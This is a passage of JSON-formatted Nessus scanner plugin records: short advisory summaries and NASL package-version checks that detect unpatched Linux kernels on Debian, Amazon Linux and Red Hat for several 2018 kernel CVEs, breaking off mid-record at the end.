reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686-pae\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-686-pae-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-amd64\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-amd64-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-arm64\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-arm64-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-lpae\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-armmp-lpae-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-loongson-3\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-loongson-3-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-marvell\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-marvell-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-octeon\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-octeon-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-powerpc64le\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-powerpc64le-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-686-pae\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-686-pae-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-amd64\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-rt-amd64-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-s390x\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.9.0-9-s390x-dbg\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-kbuild-4.9\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-libc-dev\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-manual-4.9\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-perf-4.9\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-source-4.9\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-support-4.9.0-9\", reference:\"4.9.110-3+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"usbip\", reference:\"4.9.110-3+deb9u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:42:20", "description": "An issue was discovered in the proc_pid_stack function in fs/proc/base.c in the Linux kernel. An attacker with a local account can trick the stack unwinder code to leak stack contents to userspace.\nThe fix allows only root to inspect the kernel stack of an arbitrary task.(CVE-2018-17972)\n\nA vulnerability was discovered in the Linux kernel that allows an attacker to escalate privileges with using a 64-bit ARM architecture.\nA local attacker with permission to create KVM-based virtual machines can both panic the hypervisor by triggering an illegal exception return (resulting in a DoS) and to redirect execution elsewhere within the hypervisor with full register control, instead of causing a return to the guest.(CVE-2018-18021)", "cvss3": {}, "published": "2018-11-09T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : kernel (ALAS-2018-1100)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17972", "CVE-2018-18021"], "modified": "2022-05-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-headers", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:perf-debuginfo", "p-cpe:/a:amazon:linux:python-perf", "p-cpe:/a:amazon:linux:python-perf-debuginfo", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2018-1100.NASL", "href": "https://www.tenable.com/plugins/nessus/118832", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2018-1100.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118832);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/31\");\n\n script_cve_id(\"CVE-2018-17972\", \"CVE-2018-18021\");\n script_xref(name:\"ALAS\", value:\"2018-1100\");\n\n script_name(english:\"Amazon Linux 2 : kernel (ALAS-2018-1100)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An issue was discovered in the proc_pid_stack function in\nfs/proc/base.c in the Linux kernel. An attacker with a local account\ncan trick the stack unwinder code to leak stack contents to userspace.\nThe fix allows only root to inspect the kernel stack of an arbitrary\ntask.(CVE-2018-17972)\n\nA vulnerability was discovered in the Linux kernel that allows an\nattacker to escalate privileges with using a 64-bit ARM architecture.\nA local attacker with permission to create KVM-based virtual machines\ncan both panic the hypervisor by triggering an illegal exception\nreturn (resulting in a DoS) and to redirect execution elsewhere within\nthe hypervisor with full register control, instead of causing a return\nto the guest.(CVE-2018-18021)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2018-1100.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Run 'yum update kernel' and reboot your instance to update your\nsystem.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17972\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:kernel-tools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"kernel-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"kernel-devel-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"kernel-headers-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"kernel-tools-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"kernel-tools-devel-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"perf-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"perf-debuginfo-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"python-perf-4.14.77-80.57.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-4.14.77-80.57.amzn2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debuginfo / kernel-debuginfo-common-x86_64 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:42:05", "description": "An update for kernel-alt is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es) :\n\n* kernel: Use-after-free in the vmacache_flush_all function resulting in a possible privilege escalation (CVE-2018-17182)\n\n* kernel: Privilege escalation on arm64 via KVM hypervisor (CVE-2018-18021)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\nThese updated kernel packages include also numerous bug fixes. Space precludes documenting all of the bug fixes in this advisory. See the descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3714391", "cvss3": {}, "published": "2018-11-27T00:00:00", "type": "nessus", "title": "RHEL 7 : kernel-alt (RHSA-2018:3656)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17182", "CVE-2018-18021"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2018-3656.NASL", "href": "https://www.tenable.com/plugins/nessus/119170", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:3656. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119170);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2018-17182\", \"CVE-2018-18021\");\n script_xref(name:\"RHSA\", value:\"2018:3656\");\n\n script_name(english:\"RHEL 7 : kernel-alt (RHSA-2018:3656)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel-alt is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es) :\n\n* kernel: Use-after-free in the vmacache_flush_all function resulting\nin a possible privilege escalation (CVE-2018-17182)\n\n* kernel: Privilege escalation on arm64 via KVM hypervisor\n(CVE-2018-18021)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\n\nBug Fix(es) :\n\nThese updated kernel packages include also numerous bug fixes. Space\nprecludes documenting all of the bug fixes in this advisory. See the\ndescriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3714391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/3714391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:3656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-17182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18021\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-17182\", \"CVE-2018-18021\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2018:3656\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3656\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-4.14.0-115.2.2.el7a\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-4.14.0-115.2.2.el7a\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:17:06", "description": "An issue was discovered in the proc_pid_stack function in fs/proc/base.c in the Linux kernel. An attacker with a local account can trick the stack unwinder code to leak stack contents to userspace.\nThe fix allows only root to inspect the kernel stack of an arbitrary task.(CVE-2018-17972)\n\nA vulnerability was discovered in the Linux kernel that allows an attacker to escalate privileges with using a 64-bit ARM architecture.\nA local attacker with permission to create KVM-based virtual machines can both panic the hypervisor by triggering an illegal exception return (resulting in a DoS) and to redirect execution elsewhere within the hypervisor with full register control, instead of causing a return to the guest.(CVE-2018-18021)", "cvss3": {}, "published": "2018-11-08T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : kernel (ALAS-2018-1100)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17972", "CVE-2018-18021"], "modified": "2022-06-01T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:kernel", "p-cpe:/a:amazon:linux:kernel-debuginfo", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-i686", "p-cpe:/a:amazon:linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:amazon:linux:kernel-devel", "p-cpe:/a:amazon:linux:kernel-headers", "p-cpe:/a:amazon:linux:kernel-tools", "p-cpe:/a:amazon:linux:kernel-tools-debuginfo", "p-cpe:/a:amazon:linux:kernel-tools-devel", "p-cpe:/a:amazon:linux:perf", "p-cpe:/a:amazon:linux:perf-debuginfo", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-1100.NASL", "href": "https://www.tenable.com/plugins/nessus/118804", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1100.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118804);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\"CVE-2018-17972\", \"CVE-2018-18021\");\n script_xref(name:\"ALAS\", value:\"2018-1100\");\n\n script_name(english:\"Amazon Linux AMI : kernel (ALAS-2018-1100)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An issue was discovered in the proc_pid_stack function in\nfs/proc/base.c in the Linux kernel. An attacker with a local account\ncan trick the stack unwinder code to leak stack contents to userspace.\nThe fix allows only root to inspect the kernel stack of an arbitrary\ntask.(CVE-2018-17972)\n\nA vulnerability was discovered in the Linux kernel that allows an\nattacker to escalate privileges with using a 64-bit ARM architecture.\nA local attacker with permission to create KVM-based virtual machines\ncan both panic the hypervisor by triggering an illegal exception\nreturn (resulting in a DoS) and to redirect execution elsewhere within\nthe hypervisor with full register control, instead of causing a return\nto the guest.(CVE-2018-18021)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1100.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update kernel' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17972\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 